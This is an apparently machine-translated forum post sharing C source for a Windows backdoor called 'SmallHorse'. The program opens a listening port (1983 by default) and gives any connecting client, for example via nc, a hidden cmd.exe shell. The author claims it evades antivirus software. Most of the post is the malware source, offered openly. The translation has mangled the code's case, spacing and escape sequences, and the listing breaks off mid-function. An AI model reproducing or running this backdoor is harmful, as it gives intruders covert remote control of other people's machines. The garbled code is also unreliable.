A simple cmdshell back door

A simple cmdshell back door

Author: Pony / SmallHorse [E.S.T VIP] (write do not write this E.S.T VIP does not matter) Source: Evil octal China recently idle boredom, wrote her own with a simple CMDSHELL back door. At the same time, the anti-virus software K is also avoided. Refer to the T-CMD source code and the previous black defense related articles. From the middle school to a lot of knowledge. The program is very simple. After running, the 1983 port is opened, or the port can be set, waiting for the client to connect. The connection can use NC. Originally, it was still designed to serve it automatically after it turned on. Due to time problems, I was complete. Usage: smallhorse [-p port] -p parameter is used to set up your own port is the source program, post it out and learn progress together.

QQ: 11189658 E-mail: horse_man@163.com Compiles under VC 6.0 Win2003 through #include #pragma Comment (lib, "ws2_32.lib") INT port = 1983; DWORD WINAPI ClientThread (LPVOID LPPAR); Void Help () {Printf ("/ ****************************** ******** /// n "); Printf (" | "|" | "|" | "|" | "" "); printf (" "Printf (" " | Smallhorse [EST] VIP 2005.03 | / N "); Printf (" | ******************************* ****** | / n "); Printf (" | usage: smallhorse [-p port] | / n "); Printf (" | | port: port number to listen on | / n "); Printf (" | Default port IS 1983 | / N "); Printf (" // ***************************************** ***** // n "); return;} void OpenDoor () {// initialize Winsock WSADATA wsaData;. SOCKET m_socket, acceptClient; sockaddr_in Service, Client; int ClientSize, i = 0; int iResult = WSAStartup (MAKEWORD (2, 2), & WSADATA); if (IRESULT! = NO_ERROR) RETURN; // Create a socket. M_socket = socket (AF_INET , SOCK_STREAM, IPPROTO_TCP); if (m_socket == SOCKET_ERROR) return; Service.sin_family = AF_INET; Service.sin_addr.s_addr = htonl (INADDR_ANY); Service.sin_port = htons (port); if (bind (m_socket, (SOCKADDR * ) & Service, sizeof (service)) == Socket_ERROR) RETURN; // Bond IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // Maximum Monitor Column 5 Printf ("/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / N ", Port); ClientSize = SizeOf (Client); While (1) {Acceptclient = Accept (m_socket, (sockaddr *) & client, & clientsize); if (acceptclient ==

Socket_ERROR) RETURN; // Accept the connection printf ("Client Connected./N"); char * sendbuf = "/ ************************ ************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ********** ****************************** // n / n "; send (AcceptClient, Sendbuf, Strlen (Sendbuf), 0) ; If (Createthread (NULL, 0, Clientthread, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N"); SLEEP (1000);} wsacleanup (); return;} DWORD WINAPI ClientThread (LPVOID lpParam) {int ret; char Buf [1024]; HANDLE Rpipe, Wpipe, Wfile, Rfile; SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam; SECURITY_ATTRIBUTES sa; sa.nLength = sizeof (sa); Sa.binherithandle = true; sa.lpsecurityDescriptor = null; ret = createpipe (& rpipe, & rfile, & sa, 0); RET = CreatePipe (& WFile, & WPIPE, & SA, 0); // Establish two pipes, used to receive commands, respectively and displaying results STARTUPINFO startinfo; GetStartupInfo (& startinfo); startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; startinfo.hStdInput = Wfile; startinfo.hStdError = startinfo.hStdOutput = Rfile; startinfo.wShowW indow = SW_HIDE; char cmdline [MAX_PATH]; GetSystemDirectory (cmdline, MAX_PATH); strcat (cmdline, ( "// cmd.exe")); PROCESS_INFORMATION proinfo; ret = CreateProcess (cmdline, NULL, NULL, NULL, 1,0 , NULL, NULL, & StartInfo, & Proinfo; Unsigned long Byterec; While (1) {Sleep (100); PeeknamedPipe (Rpipe, BUF, 1024, & BYTEREC, 0, 0); if (byterec) {RET = ReadFile (rpipe, BUF, BYTEREC, & BYTEREC, 0); if (! RET) Break; Ret = Send (AcceptClient, BUF, BYTEREC, 0); if (RET <= 0) Break;} else {byterec = Recv (AcceptClient, BUF, 1024 , 0); if (byterec <=